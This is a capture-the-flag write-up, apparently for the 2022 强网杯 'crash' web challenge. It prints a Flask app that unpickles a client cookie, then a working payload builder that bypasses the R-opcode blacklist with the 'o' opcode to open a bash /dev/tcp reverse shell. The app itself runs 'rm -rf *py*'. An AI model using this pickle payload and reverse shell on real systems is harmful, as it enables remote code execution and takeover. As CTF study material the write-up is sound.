
Web-2022强网杯-crash-writeup

2022-08-01 · 3 min read
强网杯 web writeup

打开题目首页即可看到源码（`/` 路由直接把 source.txt 的内容返回），是一个 Python Flask 应用：


import base64
import os
import pickle
import random
import secrets
# import sqlite3

from flask import Flask, make_response, request, session

import admin

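app = Flask(__name__, static_url_path='')
# Key used to sign the client-side session cookie.  ``secrets`` is the
# CSPRNG API meant for key material (``random`` is a Mersenne Twister and is
# documented as unsuitable for security purposes); 32 bytes is the usual
# recommendation.  Still regenerated on every start, so sessions do not
# survive a restart or span multiple worker processes -- same as before.
app.secret_key = secrets.token_bytes(32)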

class User:
    """Login record that /login pickles into the ``userdata`` cookie.

    Attributes:
        username: the submitted username (``None`` if the field was absent).
        token: ``hash(password)``.  NOTE: CPython salts ``str`` hashes per
            interpreter process (PYTHONHASHSEED), so this value is only
            comparable inside the process that produced it.
    """

    def __init__(self, username, password):
        # Only the hash is kept on the object; the plaintext never enters the pickle.
        self.username, self.token = username, hash(password)

def get_password(username):
    """Return the reference password for *username*.

    ``"admin"`` resolves to the server-side ``admin.secret``.  Any other name
    resolves to whatever ``password`` the caller's own signed session cookie
    carries (written by /login), which may be ``None`` -- so non-admin users
    effectively choose their own reference value.

    A sqlite lookup used to live here and is now disabled.  It interpolated
    ``username`` straight into the query with an f-string, i.e. it would be an
    SQL injection if it were ever re-enabled; prefer parameterised queries.
    """
    if username != "admin":
        return session.get("password")
    return admin.secret

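@app.route('/balancer', methods=['GET', 'POST'])
def flag():
    """Authenticate the caller from the ``userdata`` cookie and greet admin.

    The cookie holds base64 of the pickle produced by :func:`login`.  The
    pickled ``token`` is compared with ``hash()`` of the password that
    :func:`get_password` yields for the pickled username.

    Returns a plain-text body: ``"Login First"`` when the cookie is missing,
    not valid base64, does not unpickle to a :class:`User`, or fails the token
    check; ``"You damm hacker!"`` when the raw pickle trips the byte
    blacklist; otherwise one of the two role messages.

    SECURITY: ``pickle.loads`` on a client-controlled cookie is remote code
    execution.  The byte blacklist only removes the ``R`` (REDUCE) opcode and
    the literal ``secret``; other opcodes such as ``o`` (OBJ) also call a
    callable with arguments taken from the stack, so the filter does not stop
    an attacker.  Left in place so the deployed behaviour is unchanged; the
    real fix is a non-executable format (JSON inside a signed cookie).
    """
    raw = request.cookies.get("userdata")
    if raw is None:
        # No cookie at all: b64decode(None) used to raise and the request
        # ended in a 500.  Treat it as "not logged in" instead.
        return "Login First"
    try:
        pickle_data = base64.b64decode(raw)
    except ValueError:  # binascii.Error (bad padding) is a ValueError subclass
        return "Login First"
    # Blacklist runs on the raw opcode bytes, before anything is executed.
    if b'R' in pickle_data or b"secret" in pickle_data:
        return "You damm hacker!"
    # Challenge self-destruct: removes every *py* file in the working
    # directory (presumably the app's own source) before the untrusted load.
    # Requires ``os`` to be imported at module level.
    os.system("rm -rf *py*")
    # Untrusted deserialisation: any code embedded in the cookie runs here.
    userdata = pickle.loads(pickle_data)
    if not isinstance(userdata, User):
        # A payload that unpickles to something else (e.g. the int returned by
        # os.system) used to raise AttributeError on the attribute access below.
        return "Login First"
    if userdata.token != hash(get_password(userdata.username)):
        return "Login First"
    if userdata.username == 'admin':
        return "Welcome admin, here is your next challenge!"
    return "You're not admin!"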

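@app.route('/login', methods=['GET', 'POST'])
def login():
    """Issue the ``userdata`` cookie for the submitted username/password.

    Reads ``username`` and ``password`` from the query string or form body
    (``request.values``; either may be ``None``), stores the password in the
    Flask session and returns ``"success"`` with a one-hour ``userdata``
    cookie: base64 of a protocol-2 pickle of :class:`User`.

    SECURITY: Flask's default session cookie is signed but not encrypted, so
    the plaintext password is readable by anyone who sees the cookie.  The
    ``userdata`` cookie is the deserialisation sink consumed by :func:`flag`.
    """
    username = request.values.get("username")
    password = request.values.get("password")
    session["password"] = password
    # Decode to text: ``set_cookie`` expects a str value and Werkzeug's
    # handling of bytes differs between versions; base64 output is pure ASCII.
    blob = base64.b64encode(pickle.dumps(User(username, password), 2)).decode("ascii")
    resp = make_response("success")
    # The server is the cookie's only reader, so keep it away from page scripts
    # and cross-site requests.
    resp.set_cookie("userdata", blob, max_age=3600, httponly=True, samesite="Lax")
    return resp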

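@app.route('/', methods=['GET', 'POST'])
def index():
    """Serve the challenge source: the text of ``source.txt`` in the working directory.

    A context manager closes the file handle deterministically instead of
    leaving it to the garbage collector.  Returns the file contents as a str
    (Flask renders it as a 200 response); a missing file still raises
    ``FileNotFoundError`` exactly as before.
    """
    with open('source.txt', "r") as src:
        return src.read()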

def main() -> None:
    """Run Flask's development server on every interface, port 5000."""
    app.run(host='0.0.0.0', port=5000)


if __name__ == '__main__':
    main()

考察 Python pickle 反序列化：/balancer 路由把 cookie `userdata` 做 base64 解码后直接 `pickle.loads`，但会先拦截原始字节里含有 `R`（REDUCE 操作码）或字符串 `secret` 的 payload。
绕过思路：`o`（OBJ）操作码同样会把栈上 MARK 之后的参数传给可调用对象去调用，所以用 `o` 代替 `R` 调用 `os.system` 即可弹 shell。参考 https://xz.aliyun.com/t/8342

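import base64
import struct

# Reverse-shell command executed on the target; edit host/port before use.
CMD = 'bash -c "bash -i >& /dev/tcp/XX.XX.XX.XX/7788 0>&1"'


def build_payload(cmd: str) -> bytes:
    """Return a pickle that runs ``os.system(cmd)`` inside ``pickle.loads`` without the ``R`` opcode.

    Opcode layout (protocol 0/1):
        ``(``                 MARK
        ``cos\\nsystem\\n``   GLOBAL      -> push os.system
        ``X`` + len + utf8    BINUNICODE  -> push cmd (4-byte little-endian length)
        ``o``                 OBJ         -> pop back to MARK, call callable(*args)
        ``.``                 STOP

    The length prefix is computed from ``cmd``, so changing the host/port can
    no longer desynchronise it from the string (the original hard-coded 0x33).
    """
    body = cmd.encode("utf-8")
    return b"(cos\nsystem\nX" + struct.pack("<I", len(body)) + body + b"o."


if __name__ == "__main__":
    payload = build_payload(CMD)
    # The target rejects pickles containing b"R" or b"secret"; fail here rather
    # than after the cookie has been sent.
    if b"R" in payload or b"secret" in payload:
        raise ValueError("payload trips the server-side blacklist")
    print(base64.b64encode(payload))
    print(hex(len(CMD.encode("utf-8"))))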

把生成的 base64 串替换进 `userdata` cookie 后再请求 /balancer 即可弹 shell。注意 `X` 操作码后面的 4 字节小端长度（这里是 0x33）必须和实际命令字节数一致，换成真实 IP/端口后要用上面第二个 print 重新算。

拿到 shell 后，题目提示的是 504（上游超时）页面。/balancer 已经执行过 `rm -rf *py*`，原应用的 .py 大概率已被删；这里直接在 5000 端口再起一个 Flask，对所有请求长时间 sleep，推测是让前端负载均衡等到超时返回 504：

from flask import Flask
import random
import time
app = Flask(__name__, static_url_path="")
# Carried over from the original app; nothing below touches ``session``, so
# the key is never actually used for signing here.
app.secret_key = random.randbytes(12)

@app.route("/", methods=["GET", "POST"])
def index():
    """Hold every request open for 9000 s, then answer ``"ok"``.

    The delay, not the body, is the point: it is long enough that whatever
    sits in front of this server (presumably the balancer) gives up first.
    """
    time.sleep(9000)
    return "ok"
if __name__ == "__main__":
    # Bind to all interfaces on 5000, the same port the original app used.
    app.run(port=5000, host="0.0.0.0")

目标机上没有 vi/vim，用 cat 配合 heredoc 把上面的代码写入 app.py 即可（例如 `cat > app.py << 'EOF'` … `EOF`）。

启动 python3 app.py

再次请求首页 拿到flag